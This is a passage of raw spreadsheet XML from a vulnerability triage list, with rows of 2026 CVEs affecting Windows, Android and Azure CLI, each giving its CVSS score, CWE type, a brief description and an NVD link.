t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t></is></c></row><row r="397"><c r="A397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C397" s="5" t="inlineStr"><is><t>CVE-2026-69727</t></is></c><c r="D397" s="5" t="n"><v>8</v></c><c r="E397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G397" s="5" t="inlineStr" /><c r="H397" s="5" t="n"><v>0.007</v></c><c r="I397" s="5" t="inlineStr" /><c r="J397" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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97" s="5" t="inlineStr" /><c r="M397" s="5" t="inlineStr" /><c r="N397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P397" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q397" s="5" t="inlineStr" /><c r="R397" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S397" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t></is></c></row><row r="398"><c r="A398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C398" s="5" t="inlineStr"><is><t>CVE-2026-69762</t></is></c><c r="D398" s="5" t="n"><v>8</v></c><c r="E398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G398" s="5" t="inlineStr" /><c r="H398" s="5" t="n"><v>0.007</v></c><c r="I398" s="5" t="inlineStr" /><c r="J398" s="5" t="inlineStr" /><c r="K398" s="5" t="inlineStr" /><c r="L398" s="5" t="inlineStr" /><c r="M398" s="5" t="inlineStr" /><c r="N398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P398" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q398" s="5" t="inlineStr" /><c r="R398" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S398" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t></is></c></row><row r="399"><c r="A399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C399" s="5" t="inlineStr"><is><t>CVE-2026-69773</t></is></c><c r="D399" s="5" t="n"><v>8</v></c><c r="E399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G399" s="5" t="inlineStr" /><c r="H399" s="5" t="n"><v>0.007</v></c><c r="I399" s="5" t="inlineStr" /><c r="J399" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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99" s="5" t="inlineStr" /><c r="M399" s="5" t="inlineStr" /><c r="N399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P399" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q399" s="5" t="inlineStr" /><c r="R399" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S399" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t></is></c></row><row r="400"><c r="A400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C400" s="5" t="inlineStr"><is><t>CVE-2026-69777</t></is></c><c r="D400" s="5" t="n"><v>8</v></c><c r="E400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G400" s="5" t="inlineStr" /><c r="H400" s="5" t="n"><v>0.005</v></c><c r="I400" s="5" t="inlineStr" /><c r="J400" s="5" t="inlineStr" /><c r="K400" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L400" s="5" t="inlineStr" /><c r="M400" s="5" t="inlineStr" /><c r="N400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q400" s="5" t="inlineStr" /><c r="R400" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S400" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t></is></c><c r="T400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t></is></c></row><row r="401"><c r="A401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C401" s="5" t="inlineStr"><is><t>CVE-2026-69807</t></is></c><c r="D401" s="5" t="n"><v>8</v></c><c r="E401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F401" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G401" s="5" t="inlineStr" /><c r="H401" s="5" t="n"><v>0.008999999999999999</v></c><c r="I401" s="5" t="inlineStr" /><c r="J401" s="5" t="inlineStr" /><c r="K401" s="5" t="inlineStr" /><c r="L401" s="5" t="inlineStr" /><c r="M401" s="5" t="inlineStr" /><c r="N401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P401" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q401" s="5" t="inlineStr" /><c r="R401" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S401" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t></is></c></row><row r="402"><c r="A402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C402" s="5" t="inlineStr"><is><t>CVE-2026-69826</t></is></c><c r="D402" s="5" t="n"><v>8</v></c><c r="E402" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G402" s="5" t="inlineStr" /><c r="H402" s="5" t="n"><v>0.007</v></c><c r="I402" s="5" t="inlineStr" /><c r="J402" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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02" s="5" t="inlineStr" /><c r="M402" s="5" t="inlineStr" /><c r="N402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P402" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q402" s="5" t="inlineStr" /><c r="R402" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t></is></c></row><row r="403"><c r="A403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C403" s="5" t="inlineStr"><is><t>CVE-2026-69847</t></is></c><c r="D403" s="5" t="n"><v>8</v></c><c r="E403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G403" s="5" t="inlineStr" /><c r="H403" s="5" t="n"><v>0.005</v></c><c r="I403" s="5" t="inlineStr" /><c r="J403" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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03" s="5" t="inlineStr" /><c r="M403" s="5" t="inlineStr" /><c r="N403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q403" s="5" t="inlineStr" /><c r="R403" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S403" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t></is></c></row><row r="404"><c r="A404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C404" s="5" t="inlineStr"><is><t>CVE-2026-69875</t></is></c><c r="D404" s="5" t="n"><v>8</v></c><c r="E404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F404" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G404" s="5" t="inlineStr" /><c r="H404" s="5" t="n"><v>0.008</v></c><c r="I404" s="5" t="inlineStr" /><c r="J404" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K40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404" s="5" t="inlineStr" /><c r="M404" s="5" t="inlineStr" /><c r="N404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P404" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q404" s="5" t="inlineStr" /><c r="R404" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S404" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t></is></c></row><row r="405"><c r="A405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C405" s="5" t="inlineStr"><is><t>CVE-2026-69876</t></is></c><c r="D405" s="5" t="n"><v>8</v></c><c r="E405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G405" s="5" t="inlineStr" /><c r="H405" s="5" t="n"><v>0.006</v></c><c r="I405" s="5" t="inlineStr" /><c r="J405" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K405" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L405" s="5" t="inlineStr" /><c r="M405" s="5" t="inlineStr" /><c r="N405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q405" s="5" t="inlineStr" /><c r="R405" s="5" t="inlineStr"><is><t>CWE-415, CWE-416</t></is></c><c r="S405" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t></is></c></row><row r="406"><c r="A406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C406" s="5" t="inlineStr"><is><t>CVE-2026-83948</t></is></c><c r="D406" s="5" t="n"><v>8</v></c><c r="E406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G406" s="5" t="inlineStr" /><c r="H406" s="5" t="n"><v>0.004</v></c><c r="I406" s="5" t="inlineStr" /><c r="J406" s="5" t="inlineStr" /><c r="K406" s="5" t="inlineStr"><is><t>microsoft:vm_repair</t></is></c><c r="L406" s="5" t="inlineStr" /><c r="M406" s="5" t="inlineStr" /><c r="N406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P406" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q406" s="5" t="inlineStr" /><c r="R406" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S406" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t></is></c><c r="T406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t></is></c></row><row r="407"><c r="A407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C407" s="5" t="inlineStr"><is><t>CVE-2026-0065</t></is></c><c r="D407" s="5" t="n"><v>7.8</v></c><c r="E407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F407" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G407" s="5" t="inlineStr" /><c r="H407" s="5" t="n"><v>0.001</v></c><c r="I407" s="5" t="inlineStr" /><c r="J407" s="5" t="inlineStr" /><c r="K407" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L407" s="5" t="inlineStr" /><c r="M407" s="5" t="inlineStr" /><c r="N407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P407" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q407" s="5" t="inlineStr" /><c r="R407" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S407" s="5" t="inlineStr"><is><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is></c><c r="T407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t></is></c></row><row r="408"><c r="A408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C408" s="5" t="inlineStr"><is><t>CVE-2026-0084</t></is></c><c r="D408" s="5" t="n"><v>7.8</v></c><c r="E408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F408" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G408" s="5" t="inlineStr" /><c r="H408" s="5" t="n"><v>0.001</v></c><c r="I408" s="5" t="inlineStr" /><c r="J408" s="5" t="inlineStr" /><c r="K408" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L408" s="5" t="inlineStr" /><c r="M408" s="5" t="inlineStr" /><c r="N408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P408" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q408" s="5" t="inlineStr" /><c r="R408" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S408" s="5" t="inlineStr"><is><t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t></is></c></row><row r="409"><c r="A409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C409" s="5" t="inlineStr"><is><t>CVE-2026-28572</t></is></c><c r="D409" s="5" t="n"><v>7.8</v></c><c r="E409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F409" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G409" s="5" t="inlineStr" /><c r="H409" s="5" t="n"><v>0.001</v></c><c r="I409" s="5" t="inlineStr" /><c r="J409" s="5" t="inlineStr" /><c r="K409" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L409" s="5" t="inlineStr" /><c r="M409" s="5" t="inlineStr" /><c r="N409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P409" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q409" s="5" t="inlineStr" /><c r="R409" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S409" s="5" t="inlineStr"><is><t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t></is></c></row><row r="410"><c r="A410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C410" s="5" t="inlineStr"><is><t>CVE-2026-28583</t></is></c><c r="D410" s="5" t="n"><v>7.8</v></c><c r="E410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F410" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G410" s="5" t="inlineStr" /><c r="H410" s="5" t="n"><v>0.001</v></c><c r="I410" s="5" t="inlineStr" /><c r="J410" s="5" t="inlineStr" /><c r="K410" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L410" s="5" t="inlineStr" /><c r="M410" s="5" t="inlineStr" /><c r="N410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P410" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q410" s="5" t="inlineStr" /><c r="R410" s="5" t="inlineStr"><is><t>CWE-693, CWE-787</t></is></c><c r="S410" s="5" t="inlineStr"><is><t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t></is></c></row><row r="411"><c r="A411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C411" s="5" t="inlineStr"><is><t>CVE-2026-28590</t></is></c><c r="D411" s="5" t="n"><v>7.8</v></c><c r="E411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F411" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G411" s="5" t="inlineStr" /><c r="H411" s="5" t="n"><v>0.001</v></c><c r="I411" s="5" t="inlineStr" /><c r="J411" s="5" t="inlineStr" /><c r="K411" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L411" s="5" t="inlineStr" /><c r="M411" s="5" t="inlineStr" /><c r="N411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P411" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q411" s="5" t="inlineStr" /><c r="R411" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S411" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t></is></c></row><row r="412"><c r="A412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C412" s="5" t="inlineStr"><is><t>CVE-2026-28593</t></is></c><c r="D412" s="5" t="n"><v>7.8</v></c><c r="E412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F412" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G412" s="5" t="inlineStr" /><c r="H412" s="5" t="n"><v>0.001</v></c><c r="I412" s="5" t="inlineStr" /><c r="J412" s="5" t="inlineStr" /><c r="K412" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L412" s="5" t="inlineStr" /><c r="M412" s="5" t="inlineStr" /><c r="N412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P412" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q412" s="5" t="inlineStr" /><c r="R412" s="5" t="inlineStr"><is><t>CWE-356</t></is></c><c r="S412" s="5" t="inlineStr"><is><t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t></is></c></row><row r="413"><c r="A413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C413" s="5" t="inlineStr"><is><t>CVE-2026-28594</t></is></c><c r="D413" s="5" t="n"><v>7.8</v></c><c r="E413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F413" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G413" s="5" t="inlineStr" /><c r="H413" s="5" t="n"><v>0.001</v></c><c r="I413" s="5" t="inlineStr" /><c r="J413" s="5" t="inlineStr" /><c r="K413" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L413" s="5" t="inlineStr" /><c r="M413" s="5" t="inlineStr" /><c r="N413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P413" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q413" s="5" t="inlineStr" /><c r="R413" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S413" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t></is></c></row><row r="414"><c r="A414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C414" s="5" t="inlineStr"><is><t>CVE-2026-28599</t></is></c><c r="D414" s="5" t="n"><v>7.8</v></c><c r="E414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F414" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G414" s="5" t="inlineStr" /><c r="H414" s="5" t="n"><v>0.001</v></c><c r="I414" s="5" t="inlineStr" /><c r="J414" s="5" t="inlineStr" /><c r="K414" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L414" s="5" t="inlineStr" /><c r="M414" s="5" t="inlineStr" /><c r="N414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P414" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q414" s="5" t="inlineStr" /><c r="R414" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S414" s="5" t="inlineStr"><is><t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t></is></c></row><row r="415"><c r="A415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C415" s="5" t="inlineStr"><is><t>CVE-2026-28600</t></is></c><c r="D415" s="5" t="n"><v>7.8</v></c><c r="E415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F415" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G415" s="5" t="inlineStr" /><c r="H415" s="5" t="n"><v>0.001</v></c><c r="I415" s="5" t="inlineStr" /><c r="J415" s="5" t="inlineStr" /><c r="K415" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L415" s="5" t="inlineStr" /><c r="M415" s="5" t="inlineStr" /><c r="N415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P415" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q415" s="5" t="inlineStr" /><c r="R415" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S415" s="5" t="inlineStr"><is><t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t></is></c></row><row r="416"><c r="A416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C416" s="5" t="inlineStr"><is><t>CVE-2026-28602</t></is></c><c r="D416" s="5" t="n"><v>7.8</v></c><c r="E416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F416" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G416" s="5" t="inlineStr" /><c r="H416" s="5" t="n"><v>0.001</v></c><c r="I416" s="5" t="inlineStr" /><c r="J416" s="5" t="inlineStr" /><c r="K416" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L416" s="5" t="inlineStr" /><c r="M416" s="5" t="inlineStr" /><c r="N416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P416" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q416" s="5" t="inlineStr" /><c r="R416" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S416" s="5" t="inlineStr"><is><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is></c><c r="T416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t></is></c></row><row r="417"><c r="A417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C417" s="5" t="inlineStr"><is><t>CVE-2026-28603</t></is></c><c r="D417" s="5" t="n"><v>7.8</v></c><c r="E417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F417" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G417" s="5" t="inlineStr" /><c r="H417" s="5" t="n"><v>0.001</v></c><c r="I417" s="5" t="inlineStr" /><c r="J417" s="5" t="inlineStr" /><c r="K417" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L417" s="5" t="inlineStr" /><c r="M417" s="5" t="inlineStr" /><c r="N417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P417" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q417" s="5" t="inlineStr" /><c r="R417" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S417" s="5" t="inlineStr"><is><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is></c><c r="T417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t></is></c></row><row r="418"><c r="A418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C418" s="5" t="inlineStr"><is><t>CVE-2026-28607</t></is></c><c r="D418" s="5" t="n"><v>7.8</v></c><c r="E418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F418" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G418" s="5" t="inlineStr" /><c r="H418" s="5" t="n"><v>0.001</v></c><c r="I418" s="5" t="inlineStr" /><c r="J418" s="5" t="inlineStr" /><c r="K418" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L418" s="5" t="inlineStr" /><c r="M418" s="5" t="inlineStr" /><c r="N418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P418" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q418" s="5" t="inlineStr" /><c r="R418" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S418" s="5" t="inlineStr"><is><t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T418" s="6" 